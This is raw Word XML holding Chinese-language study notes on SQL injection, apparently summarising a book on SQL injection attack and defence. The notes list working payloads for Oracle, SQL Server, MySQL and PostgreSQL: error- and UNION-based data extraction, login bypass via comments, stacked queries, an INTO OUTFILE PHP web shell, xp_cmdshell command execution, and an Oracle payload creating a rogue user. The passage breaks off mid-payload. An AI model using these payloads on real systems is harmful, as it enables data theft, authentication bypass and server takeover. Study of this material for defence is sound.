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</w:t>
      </w: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章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利用SQL盲注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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>章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通过SQL注入利用操作系统漏洞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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>章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二阶SQL注入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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>章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代码层防御SQL注入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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>章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平台层防御SQL注入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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>章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从攻击中恢复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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>章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各数据库的细节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发现SQL注入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用户层</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:p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例如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>：?param=abc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="84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字符串拼接后结果相同</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="126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Oracle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PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>：?param=a’||’bc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="126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SQL Server：?param=a’+’bc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="126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MySQL：a’’bc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="84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使其报错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="126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错误是否直接展示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尝试使其报错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>：?param=abc’</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="168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若直接展示</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="210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报</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>了哪些字段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通过构造错误的group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by和having组合</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="25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SQL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Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>：?param=abc’ having ‘1’=’1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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假设报出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>table.id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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?param=abc’ group by id having ‘1’=’1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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假设报出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> table.name</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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?param=abc’ group by id, name having ‘1’=’1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="210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报字段值</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="25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MySQL：@@version、version()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="25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Oracle：select banner from v$version where rownum=1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="25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PostgreSQL：version()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="25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SQL Server：?param=abc’ and 1=0/@@version and ‘1’=’1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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会报出版本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将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>@@version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>换成其他字段已使其报出值</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="336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?param=abc’ and 1=0/name and ‘1’=’1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="336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假设报出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>admin，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>然后通过not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in排除已知的值</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="336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?param=abc’ and name not in(‘admin’) and 1=0/name and ‘1’=’1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="336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...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="210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Oracle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>报错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向解析主机名的函数传入想要的字段值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使其报错显示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但确保传入参数只能有一行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>，11g+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>已不可用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加了ACL限制对网络包的访问</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="25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select utl_inaddr.get_host_name( select username||’=’||password from dab_users where rownum=1 ) from dual</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="25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更多信息见</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>《</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>SQL注入攻击与防御</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>》P136</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="210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确定查询字段数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="25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union方式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不断添加null的个数直到不再报错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用null的原因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数据类型需要和原始查询兼容</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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?param=abc’+union+select+null-- </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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Oracle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">select+null+from+dual-- </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="252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order by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>方式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开始试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直到报错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最大的不报错值就是字段数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这种方式更好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可用二分法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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?param=abc’+order+by+5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="210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确定字符串类型字段用来显示值</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="25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将union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select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null中的null挨个儿换成字符串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不报错的那个就是字符串类型的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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?param=abc’+union+select+null,’’,null-- </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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通过字符串拼接尽量将我们要的信息尽可能多的从这一列提取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SQL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Server为例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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?param=abc’+union+select+null,system_user%2B’+|+’%2Bdb_name(),null-- </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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如果应用只返回第一行数据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那么需要把原始查询置永假</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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?param=abc’+and+’1’=’2+union+select+null,system_user%2B’+|+’%2Bdb_name(),null-- </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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有时需要手动转为字符串</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="336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Oracle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>：select cast(1 as varchar) from dual</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="336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SQL Server：select cast(‘1’ as varchar)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="336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MySQL：select cast(‘1’ as char)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="336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PostgreSQL：select cast(1 as text)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="168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不直接展示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>（302</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>跳转指定页</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>、500</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>提示错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="210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错误是否由数据库真实解析引起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比如对于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>?id=2，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>尝试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>?id=1%2B1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>?id=3-1，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>观察结果是否相同</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="25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分别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正常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永真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永假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观察返回结果的区别</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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正常</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>：?param=abc’ or ‘1’=’2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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永真</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>：?param=abc’ or ‘1’=’1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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永假</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>：?param=abc’ and ‘1’=’2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="336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如果union了其他内容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永假仍会返回结果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考虑终止式注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="210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内联式注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="25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修改优先级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比如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>where username=a and password=b</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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返回admin或密码为空的账户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>：where username=’admin’ and ‘1’=’1’ or ‘1’=’1’ and password=’’</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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返回所有账户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>：where username=’’ and password=’’ or ‘1’=’1’</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="210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终止式注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="25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单行注释</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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Oracle、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>SQL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Server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PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>：--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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MySQL：--(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>一个空白字符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>)、#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="25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多行注释</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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MySQL、Oracle、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>SQL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Server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PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>：/* */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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对于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>MySQL，select 1/*!40119 +1*/。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>如果版本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>&gt;=4.01.19，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>注释中的代码会被执行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返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>2，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>否则返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="25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避开上例的密码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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where username=’admin’ or 1=1;-- ‘ and password=’’ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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where username=’admin’/*’ and password=’*/’’;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="210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堆叠查询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形如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>；command 1; command2; command 3;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="25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支持度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不同语言访问不同数据库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支持度是不同的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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Oracle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不支持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只能使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>PL/SQL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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SQL S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>erver</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>：6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0+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>：4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1+，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>默认关闭</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="25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任意代码执行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结束之前的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添加自己的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注释之后的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如果数据库权限足够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是可以操作服务器的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比如读取写入文件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调用shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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以windows上的mysql为例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制造一个可执行任意代码的文件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通过访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://网站/shell.php?cmd=命令" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>网站</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>/shell.php?cmd=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/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来让服务器执行命令</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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?param=abc’; select ‘&lt;?php echo shell_exec($_GET[“cmd”]);?&gt;’ into outfile ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>网站目录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">/shell.php’;-- </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>上的SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>为例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使其执行dir</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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?param=abc’; exec+master..xp_cmdshell+’dir’</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="2940" w:leftChars="0"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Oracle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>通过函数执行匿名PL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SQL块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以创建新用户为例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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?param=abc’ and (select dbms_xmlquery.netcontext(‘declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ‘’ create user pwned identified by pwn3d ‘’; commit; end;’) from dual) is not null;-- </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="25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时延</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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SQL Server：?param=abc’; waitfor delay ’0:0:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>秒数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">’;-- </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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MySQL：?param=abc’; select benchmark(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>重复执行次数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">, encode(‘hello’, ‘sql’));-- </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>racle：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="336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PL/SQL：BEGIN DBMS_LOCK.SLEEP(</w:t>
      </w:r>
      <w:r>
